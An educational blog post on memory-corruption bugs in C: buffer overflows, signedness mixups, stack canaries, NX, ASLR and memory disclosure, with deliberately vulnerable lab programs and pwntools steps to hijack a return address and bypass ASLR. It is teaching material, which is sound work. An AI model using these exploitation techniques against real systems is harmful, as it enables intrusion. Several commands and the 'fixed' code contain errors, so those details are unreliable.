Memory Errors
Created On 19. Jun 2021
Updated: 2021-06-26 23:38:33.785475000 +0000
Created By: acidghost
In 1972, Dennis Ritchie created the C programming language. It was designed to ease the life of developers by making it portable between computer architectures, but still having low-level control of memory access. C is in some sense assembly, but with register allocation done for us. It is still one of the fastest growing languages as of time this post is created and won't cease until all of the major operating systems are either rewritten or replaced. The issue about memory corruption was raised even before C was created, in 1968. In that year Robert Graham, questioned in the paper "Protection in an information processing utility.", "What if a program allows someone to overwrite memory they are not supposed to?". C allows exactly this and much more.
Compared to other programming languages, C will trust the developer. Many languages have protections, as for example in Python, if an index out of an array will be accessed then an error will be thrown. However, C will allow this. Surely, it is possible to make it secure in C by creating a structure with an array and size. Still, this is something the developers would have to mind.
Remember the stack?
+----------------------+ <-- Maximum address of stack
| STACK |
+----------------------+
| local buffer |
+----------------------+
| local variable |
+----------------------+
| saved rbp |
+----------------------+
| return address |
+----------------------+
Lowest Memory
visuals from https://eugenekolo.com/blog/stack-ascii-visualization/
On the stack a lot of data is stored together and treated the same. What can happen? Well, there are a few things that can be exploited such as:
- a value that influences various conditions
- a read pointer or offset that can allow accessing arbitrary memory
- a write pointer or offset that can allow to deliberately overwrite arbitrary memory
- a code pointer that can allow to redirect the program execution
This usually happens when insecure programming practices are used with gets, strcpy, scanf etc. or pointers are passed around without their size.
Causes of corruption
Below are listed a few of the most common causes how memory can get overwritten or leaked.
1. Buffer Overflow
C does not implicitly track sizes. To avoid issues around this, it is important to have checks in the program that will track these sizes. When the sizes are not specified, a buffer overflow can be triggered. Below is a simple program with the that reads 128 bytes into the buffer while it can hold only 16.
int main() { vuln(); }
int vuln(int agrc, char **argv, char **envp)
{
char small_buffer[16];
read(0, small_buffer, 128);
}
void win() { sendfile(1, open("./flag", 0), 0, 128); }
After compiling with
gcc -o gcc -fno-stack-protector buffer_overflow buffer_overflow.c
running and providing some random input, you will see that the program crashes. Why? Well, it was never designed to not have any sort of bugs, but mainly because it reads from the buffer more than it can actually hold. A length longer than 16 bytes, will crash the program and fill the stack with the provided data. Now what does that mean? The program returns the data that was provided and that means that we can return anywhere we want. If we will return to the "win" function, we can then execute it and leak the flag. Well, let's do it!
So, we have a buffer that is 16 bytes long in size. The return address is situated after that. Between the return address and the buffer there is still some padding and other things on the stack. From this we need to find out the exact position of the address.
Launch a debugger in pwntools like this
import pwn
r = pwn.gdb.debug("./buffer_overflow")
This will launch the process with the debugger attached to gdb.
Then run the program, write to it a cyclic pattern and see it crash.
r.send(pwn.cyclic(128))
A cyclic pattern has patterns that can be located at specific locations.
After that see the value of rsp with x/s $rsp
at which step in the pattern it crashed. Then with
pwn.cyclic_find("{here_goes_the_located_pattern_from_rsp}")
we will see how many bytes far into the input is the return address.
Overwrite into the input + the return address with B's like this:
r.send(b"A"*{the_size_of_bytes_until_the_return_address}+b"B"*{the_size_of_the_return_address_which_is_8})
Then take the address of the win function and convert to a byte representation
pwn.p64("{address_of_win")
Then overwrite the return address with the address of the win function:
r.send(b"A"*{the_size_of_bytes_until_the_return_address}+pwn.p64("{address_of_win"))
Then read the flag on your local system and hope there is not some garbage instead
r.readall()
2. Signedness Mixups
The standard C library uses unsigned integers for sizes (last arugument to read, memcmp etc.). The default integer types (short, int long) are signed. Recall Two's Complement. An issue that can arise is where the signedness is mixed up. For example see the program below:
int main() {
int size;
char buf[16];
scanf("%i", &size);
if (size > 16) exit(1);
read(0, buf, size);
}
Sending a negative number in this case will cause very large read of 2^32 - 1(4294967295). If you strace
the program, you can see how after providing an input of -1
, the read takes an integer up to 4294967295.
We can also fix this by setting rdx to 0xfff during the read to reduce the size of the largest possible number. However, simply explained, if sizes are not declared, the program will read the largest possible unsigned integer even if the size is of type signed int
.
Mitigations
Below are described measures how modern systems are protected against memory corruption, why they are not always effective and few techniques how they can be bypassed
1. Stack Canaries
Stack canaries are a way to mitigate buffer overflow attacks by inducing secret canary values on the stack that will be checked and detect if something tries to overflow it. Compile the buffer overflow example from above with gcc -o buffer_overflow_canary buffer_overflow.c
to leave the canary enabled and run checksec --file=buffer_overflow_canary
and see what is enabled.
When crashing the program with an input, the canary can be found, after the read in the buffer, before the call for stack check occurs.
Let's check this in the main function closer in objdump.
The value in [rbx-0x8]
is read and then fs:0x28
is xor
ed against rcx. The canary is stored in [rbx-0x8]
. fs:0x28
is a value stored globally, hidden in a secret spot indexed by the fs
register. The program starts up and then there is a value initialized in a secret location that is then later on checked by the je
function for the 0 flag and if the condition is not fulfilled (the canary changed), then the stack overflow is detected. Notice how in the example above, the secret value is overwritten with our input that gets passed from eax
. This is the result from our input being written into [rbx-0x8]
, that alters the canary.
How to bypass stack canaries
Leaking stack canaries might seem easy, but this is not always the case. There are few methods that can be used to leak the canary. Remember that each canary will start with a 0
byte.
1. Leak it
One way to do it is by leaking it with another vulnerability. However, this is very situational and if an appropriate vulnerability is detected.
2. Brute Force
The canary is rerandomized only with every start of the process. However, there are a lot of processes that fork themselves. For these processes, where parent forks children, it is possible to continuously send input to detect where the canary bytes are located. After that when they are known, overwritten the canary with the same bytes will bypass it.
3.Jump it
The program below reads from an offset of +1
.
int main() {
char buf[16];
int i;
for (i=0; i < 128; i++) read(0, buf+1, 1);
}
When this happens and an overflow occurs, it can also start writing into the integer i
itself, which will already be past from where it actually reads the data.
2. No-Execute (NX)
In Shellcoding, we made the .text segment executable. The NX bit is the one responsible for marking allowed and disallowed memory regions for being executable. When compiling a program with gcc, it can be allowed for execution with -z execstack
flag or disallowed with -z noexecstack
.Also see:
https://en.wikipedia.org/wiki/Executable_space_protection
https://en.wikipedia.org/wiki/NX_bit
3. Address Space Layout Randomization (ASLR)
With ASLR the pointers in memory point to random locations. This way also an attacker can use it to point to anything they want. ASLR will randomize everything up to the fourth last significant nibble in a memory address. This was brought by PaX in 2001. PaX is lead by an anonymous coder and they have released many patches in the Linux kernel.
How to deal with ASLR
There are various methods to leak it. Similar as with the canary, it can be leaked and brute forced. Another approach is overwrite the page offset since assets are page aligned. Pages are always aligned to a 0x1000 alignment.
The last three nibbles of an address are never changed. To overwrite the least significant bytes of a pointer, a nibble has to be brute forced. Since a nibble can take 16 values, this can be composed as a brute force check. Let's return to the first example in this post.
We include the vuln function into the main, so we can see the address, since otherwise when libc starts main, it will call main and will get the main address in libc. Compiling without PIE, will turn off the stack address randomization
gcc -fno-stack-protector -no-pie -o buffer_overflow buffer_overflow.c
Compile like this with PIE and without stack protection (which helps in debugging):
gcc -fno-stack-protector -o buffer_overflow buffer_overflow.c
See how the addresses differ viewing both compilations in objdump objdump -M intel -d buffer_overflow
.
You will notice that in the first, the addresses always are the same, while in the second there are just offsets in memory where the program will be loaded.
So let's now return the execution of main to win. When main will be executed we will jump straight to win.In objdump, we can see that there is only one byte difference between those addresses. In gdb ASLR will be automatically disabled, if there are permissions to do so. You will notice that always when launching a program in gdb and it disables the randomization, the base address will be 0x5555555540000
. Note that from each architecture this will differ. Either you are running it on a VM, on a Mac or 32-bit Linux machine, you might need to take extra steps to disable the ASLR when launching the program. Also see:
https://stackoverflow.com/questions/1455904/how-to-disable-address-space-randomization-for-a-binary-on-linux
https://askubuntu.com/questions/318315/how-can-i-temporarily-disable-aslr-address-space-layout-randomization
Run in gdb and break at vuln.
gdb ./buffer_overflow
b vuln
r
Disassemble vuln and win to see the addresses. Then let's write the win address into main at the point when we already stepped into vuln:
set *(unsigned char *)$rsp = 0x{the_rightmost_2_nibbles_of_the_win_address}
The addresses might differ in your disassembly, so there will be different values.
Check the return address x/gx $rsp
.
The same can be done in pwntools:
import pwn
r = pwn.process("./buffer_overflow")
r.write(b"A"*{size_of_padding}+b"0x{the_rightmost_2_nibbles_of_the_win_address}")
r.clean()
The size of padding can vary but you can always check it starting from about 18 bytes. In pwntools ASLR can be disabled locally with:
pwn.process("./buffer_overflow", aslr=False)
or in bash
$ setarch x86_64 -R /bin/bash
Memory Disclosure
As described above, there are some measures to tighten the security that would minimize the chance for an attacker to corrupt the memory. However, as in the examples above if the secret value of the canary gets leaked out or it is known where the the memory pointers mapped by aslr are pointing, then this will lead to memory disclosures.
1. Buffer Overread
Similar to a buffer overwrite, a buffer overread can leak out the data because the program reads more than it can actually hold.
2. Termination
If there are uninitialized values and the program accepts for example only strings, providing a large input can leak also other things on the stack. The solution is to null terminate the strings, however, often people forget to do this. This is also why the canary starts with a null byte - this is a measure against forgotten implementation of null termination after the read.
3. Uninitialized Data
In crypto implementations for example, a lot of optimizations remove uninitialized data by default. Why keep a variable that will never be used?
int main() { foo(); bar(); }
void foo() { char foo_buffer[64]; read(open("flag", 0), foo_buffer, 64); memset(foo_buffer, 0, 64); }
void bar() { char bar_buffer[64]; write(1, bar_buffer, 64); }
compile with enabled optimizations gcc -o unit unit.c -03 -fno-inline
Run it in objdump -M intel unit
and see that the call to memset
was removed.
From this point also languages like Rust become vulnerable, that were built with idea to be secure against memory errors. To meet certain criteria often security measures are left out.
The solution to this is to initialize the buffer:
void bar() { char bar_buffer[64]; write(1, bar_buffer, 64); }
References and Further Reads
https://pwn.college/modules/memory
http://scottmcpeak.com/memory-errors/
https://mcuoneclipse.com/2019/09/28/stack-canaries-with-gcc-checking-for-stack-overflow-at-runtime/
https://bananamafia.dev/post/binary-canary-bruteforce/
https://security.stackexchange.com/questions/47807/nx-bit-does-it-protect-the-stack
https://www.win.tue.nl/~aeb/linux/hh/protection.html
https://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx
Section: Binary Exploitation (PWN)
Back